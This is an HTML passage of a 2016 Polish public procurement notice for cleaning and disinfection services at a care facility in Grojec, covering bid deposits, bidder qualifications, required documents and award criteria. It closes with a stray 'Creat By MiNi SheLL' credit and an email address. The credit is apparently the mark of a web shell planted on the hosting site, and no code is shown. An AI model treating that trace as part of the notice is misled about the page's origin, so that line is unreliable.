Wykonawca zobowiązany jest stosować własny profesjonalny sprzęt do mycia oraz profesjonalne mechaniczne urządzenia do czyszczenia, dezynfekcji oraz zapewnić odpowiednią ilość mopów i innego sprzętu niezbędnego do wykonania usługi.
Sprzątanie odbywać się będzie codziennie przez 7 dni w tygodniu obejmujące metraż pomieszczeń PZOL w Grojcu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 20 procent zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 13.000,00 zł
Wadium może być wnoszone w jednej lub kilku następujących formach
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju   Przedsiębiorczości Dz. U. z 2007r Nr 42, poz. 275.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego: ING Bank Śląski  nr 74 1050 1445 1000 0090 3022 6808 z dopiskiem, Wadium w przetargu nieograniczonym na usługę sprzątania i dezynfekcji PZOL w Grojcu . Wadium wniesione w tej formie zamawiający zwraca bez odsetek, co wynika z umowy rachunku bankowego, na którym będzie ono przechowywane.
Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, któremu Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na skutek okoliczności, o których mowa w pkt. 4, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium , jeżeli wykonawca, którego oferta została wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności. Zamawiający uzna, że warunek ten został spełniony przez złożenie oświadczenia Wykonawcyzał. nr 3 do SIWZ. Sposób oceny wg reguły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia. Zamawiający uzna, że warunek ten został spełniony przez złożenie
oświadczenia Wykonawcy  zał. nr 3 do SIWZ,
wykazu co najmniej 2 usług odpowiadających przedmiotowi zamówienia  tj. usługi z których każda musi obejmować kompleksowe sprzątanie w jednostce prowadzącej działalność medyczną,  a w przypadku świadczeń okresowych lub ciągłych również wykonanej usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie, o wartości co najmniej 300 000,00  zł  w skali roku każda z nich- zał. nr 6 do SIWZ .
Sposób oceny wg reguły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Zamawiający uzna, że warunek ten został spełniony przez złożenie
oświadczenia Wykonawcy  zał. nr 3 do SIWZ,
Wykonawca składający ofertę musi wykazać, że dysponuje 
 minimum 6 osobami z czego w grupie wskazanych osób, które będą uczestniczyć w wykonaniu zamówienia minimum 3 osoby posiadające uprawnienia i kwalifikacje w zakresie czynności opiekuńczych. Wymagane jest przedłożenie stosownych zaświadczeń o ukończeniu kursu/szkoleń dla opiekunów/opiekunek zał. nr 7 do SIWZ.
Sposób oceny wg reguły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Zamawiający uzna, że warunek ten został spełniony przez złożenie
oświadczenia Wykonawcy  zał. nr 3 do SIWZ;
Wykonawca składający ofertę musi wykazać, że dysponuje 
minimum 6 osobami z czego w grupie wskazanych osób, które będą uczestniczyć w wykonaniu zamówienia minimum 3 osoby posiadające uprawnienia i kwalifikacje w zakresie czynności opiekuńczych. Wymagane jest przedłożenie stosownych zaświadczeń o ukończeniu kursu/szkoleń dla opiekunów/opiekunek zał. nr 7 do SIWZ.
Sposób oceny wg reguły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej. Zamawiający uzna, że warunek ten został spełniony przez złożenie
oświadczenia Wykonawcy  zał. nr 3 do SIWZ;
opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniej niż 500 000,00  zł.Sposób oceny wg reguły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty  dot. podpisania oferty przez osobę upoważnioną przez Wykonawcę /o ile dotyczy/.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Koncepcja realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony postanawiają ,iż mogą dokonać w formie pisemnego aneksu zmiany wynagrodzenia w wypadku wystąpienia jednej ze zmian przepisów wskazanych w art. 142 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tj. zmiany
stawki podatku od towarów i usług
wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3 do 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę 
zasad podlegania ubezpieczeniom  społecznemu  lub zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w ust.1 
Wynagrodzenie Wykonawcy może ulec zmianie w przypadku wystąpienia okoliczności o których mowa w art. 142 ust. 5 - Prawo  zamówień  publicznych t.j. Dz. U. z 2013.907 ze zm.przy zachowaniu następujących zasad
Wykonawca przedstawi szczegółową dokumentację , z której wynika różnica pomiędzy dotychczasowym wynagrodzeniem , a wynikającymi ze zmian wyprowadzonych przepisami.
Wykonawca wykaże wpływ zmian ustawowych o których mowa w art. 142 ust .5 Pzp na koszty wykonywania przedmiotu umowy.
odpowiednia zmiana wynagrodzenia wynikająca ze zmiany przepisów prawa obowiązywać będzie od daty wykazania zmian.
Wykonawca ma obowiązek zgłosić żądanie zmiany wynagrodzenia w terminie do 30 dni od daty wejścia w życie przepisów o których mowa w art. 142 ust.5 Pzp pod rygorem utraty uprawnienia  o którym mowa w pkt 1.
W przypadku zmiany, o której mowa w ust. 1 lit.a wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
W przypadku zmiany, o której mowa w ust. 1 lit. b wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. ilość osób zgodnie z załącznikiem nr 7 do SIWZ.
W przypadku zmiany, o której mowa w ust. 1 lit. c wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzol.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu Aleja Ogrodowa 1, 32-615 Grojec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2016 godzina 10:00, miejsce: Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu Aleja Ogrodowa 1, 32-615 Grojec
 w dziale księgowości w pokoju nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com